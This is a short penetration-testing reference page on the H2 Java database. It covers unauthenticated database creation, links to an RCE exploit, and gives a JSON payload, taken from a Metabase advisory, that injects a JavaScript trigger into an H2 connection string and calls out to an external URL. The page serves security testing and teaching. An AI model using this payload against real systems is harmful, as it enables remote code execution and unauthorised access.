# H2 - Java SQL database

{{#include ../../banners/hacktricks-training.md}}

Official page: [https://www.h2database.com/html/main.html](https://www.h2database.com/html/main.html)

## Access

You can indicate a **non-existent name a of database** in order to **create a new database without valid credentials** (**unauthenticated**):

![](<../../images/image (131).png>)

Or if you know that for example a **mysql is running** and you know the **database name** and the **credentials** for that database, you can just access it:

![](<../../images/image (201).png>)

_**Trick from box Hawk of HTB.**_

## **RCE**

Having access to communicate with the H2 database check this exploit to get RCE on it: [https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed](https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed)

## H2 SQL Injection to RCE

In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) a payload is explained to get **RCE via a H2 database** abusing a **SQL Injection**.

```json
[...]
"details":
    {
        "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
        "advanced-options": false,
        "ssl": true
    },
[...]
```

{{#include ../../banners/hacktricks-training.md}}